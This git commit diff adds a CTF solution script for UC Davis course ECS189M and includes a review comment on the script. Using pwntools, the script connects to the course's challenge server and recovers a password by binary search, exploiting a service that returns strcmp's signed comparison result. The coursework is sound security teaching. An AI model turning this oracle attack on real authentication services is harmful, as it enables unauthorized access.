ucdavis-ecs189m

[RADIOACTIVE] python exploits for uc davis class ecs189m

commit 3298505503c729c57ac814b9cd9f71a5442d2d00
parent 3500dba57127a1d67d991cbb3098e28b0ae1b3f5
Author: therealFIGBERT <figbertwelner@gmail.com>
Date:   Sun,  5 Jan 2020 15:44:56 -0800

Move third_flag.py to linux_and_misc/scripts/strcmp.py and add header to the file

Diffstat:
Alinux_and_misc/scripts/strcmp.py | 89+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Dthird_flag.py | 83-------------------------------------------------------------------------------
2 files changed, 89 insertions(+), 83 deletions(-)

diff --git a/linux_and_misc/scripts/strcmp.py b/linux_and_misc/scripts/strcmp.py 
@@ -0,0 +1,89 @@
+# A CTF exploit by FIGBERT
+# for UC Davis class ECS189M
+# twinpeaks.cs.ucdavis.net:30004
+# Category: Linux and miscellaneous
+# Challenge: strcmp
+# 05/01/2020
+from pwn import *
+
+def string_to_integer(s: str) -> int:
+ """Returns the passed string's (b26, a-z) base10 value
+
+ Keyword arguments:
+ s -- the string to convert to an int
+ """
+ #Converts the characters to ascii representations (a=0, z=25)
+ num_values = [(ord(char)-97) for char in s][::-1]
+ lst = []
+ #Converts the number representation in the list to its base10 value
+ for pos, val in enumerate(num_values):
+ lst.append(val*(26**pos))
+ #Return the sum of the character values in base10
+ return sum(lst)
+
+def integer_to_string(num: int, max: int = 19) -> str:
+ """Returns the passed base10 int's string representation
+
+ Keyword arguments:
+ num -- the int to convert to a string
+ max -- the length of the string minus one
+ """
+ alphabetized_input = ""
+ for a in range(max,0,-1):
+ #Divides the number to get an int (0-25/a-z)
+ digit = int(num/(26**a)) if int(num/(26**a)) <= 25 else 25
+ #Converts the number to the corresponding letter
+ corresponding_character = chr(digit+97)
+ #Adds the new character to the total string
+ alphabetized_input += corresponding_character
+ num -= digit*(26**a)
+ corresponding_character = chr(int(num)+97)
+ alphabetized_input += corresponding_character
+ return alphabetized_input
+
+def passgen(low: str, high: str, size: int = 19) -> str:
+ """
+ Returns the string in the middle of `low` and `high`
+
+ Keyword arguments:
+ low -- the least string
+ high -- the highest string
+ size -- the length of the strings
+ """
+ return integer_to_string((string_to_integer(low)+string_to_integer(high))//2, size)
+
+cracked = False
+first_attempt = True
+LO = "aaaaaaaaaaaaaaaaaaaa"
+HI = "zzzzzzzzzzzzzzzzzzzz"
+connection = remote("twinpeaks.cs.ucdavis.edu", 30004)
+while not cracked:
+ #First run case
+ if first_attempt:
+ #Generates a password
+ password = passgen(LO, HI)
+ #Prints challenge
+ print(str(connection.recv(), "utf-8"))
+ #Sends and prints the password
+ connection.sendline(password)
+ print("Password: %s"%password)
+ first_attempt = False
+ else:
+ response = connection.recvline()
+ previous_pass = password
+ #Checks the response to perform binary search
+ if b" -1 " in response: #Password too small
+ LO = password
+ password = passgen(LO, HI)
+ elif b" 1 " in response: #Password too large
+ HI = password
+ password = passgen(LO, HI)
+ else: #Password cracked
+ cracked = True
+ break
+ connection.sendline(password)
+ print("Password: %s"%password)
+ connection.recvline()
+print("Flag: %s\n"%str(connection.recvline(), "utf-8").strip())
+
+connection.close()
diff --git a/third_flag.py b/third_flag.py
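Review bot: The new header names the target as `twinpeaks.cs.ucdavis.net:30004`, but the `remote(...)` call further down connects to `twinpeaks.cs.ucdavis.edu`; the comment should read `# twinpeaks.cs.ucdavis.edu:30004` so the header matches the code. The date `05/01/2020` is ambiguous between day-first and month-first, and `2020-01-05` would match the commit date. As the header is the file's only documentation, it could also state the lesson in one line, for example `# The service appears to return strcmp()'s signed result, which leaks ordering; a safe check returns only match/no-match.` Separately, `integer_to_string` derives each digit with float division (`int(num/(26**a))`) on values far above 2**53, so `num // 26**a` would keep the arithmetic exact.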
@@ -1,83 +0,0 @@
-from pwn import *
-
-def string_to_integer(s: str) -> int:
- """Returns the passed string's (b26, a-z) base10 value
-
- Keyword arguments:
- s -- the string to convert to an int
- """
- #Converts the characters to ascii representations (a=0, z=25)
- num_values = [(ord(char)-97) for char in s][::-1]
- lst = []
- #Converts the number representation in the list to its base10 value
- for pos, val in enumerate(num_values):
- lst.append(val*(26**pos))
- #Return the sum of the character values in base10
- return sum(lst)
-
-def integer_to_string(num: int, max: int = 19) -> str:
- """Returns the passed base10 int's string representation
-
- Keyword arguments:
- num -- the int to convert to a string
- max -- the length of the string minus one
- """
- alphabetized_input = ""
- for a in range(max,0,-1):
- #Divides the number to get an int (0-25/a-z)
- digit = int(num/(26**a)) if int(num/(26**a)) <= 25 else 25
- #Converts the number to the corresponding letter
- corresponding_character = chr(digit+97)
- #Adds the new character to the total string
- alphabetized_input += corresponding_character
- num -= digit*(26**a)
- corresponding_character = chr(int(num)+97)
- alphabetized_input += corresponding_character
- return alphabetized_input
-
-def passgen(low: str, high: str, size: int = 19) -> str:
- """
- Returns the string in the middle of `low` and `high`
-
- Keyword arguments:
- low -- the least string
- high -- the highest string
- size -- the length of the strings
- """
- return integer_to_string((string_to_integer(low)+string_to_integer(high))//2, size)
-
-cracked = False
-first_attempt = True
-LO = "aaaaaaaaaaaaaaaaaaaa"
-HI = "zzzzzzzzzzzzzzzzzzzz"
-connection = remote("twinpeaks.cs.ucdavis.edu", 30004)
-while not cracked:
- #First run case
- if first_attempt:
- #Generates a password
- password = passgen(LO, HI)
- #Prints challenge
- print(str(connection.recv(), "utf-8"))
- #Sends and prints the password
- connection.sendline(password)
- print("Password: %s"%password)
- first_attempt = False
- else:
- response = connection.recvline()
- previous_pass = password
- #Checks the response to perform binary search
- if b" -1 " in response: #Password too small
- LO = password
- password = passgen(LO, HI)
- elif b" 1 " in response: #Password too large
- HI = password
- password = passgen(LO, HI)
- else: #Password cracked
- cracked = True
- break
- connection.sendline(password)
- print("Password: %s"%password)
- connection.recvline()
-print("Flag: %s\n"%str(connection.recvline(), "utf-8").strip())
-
-connection.close()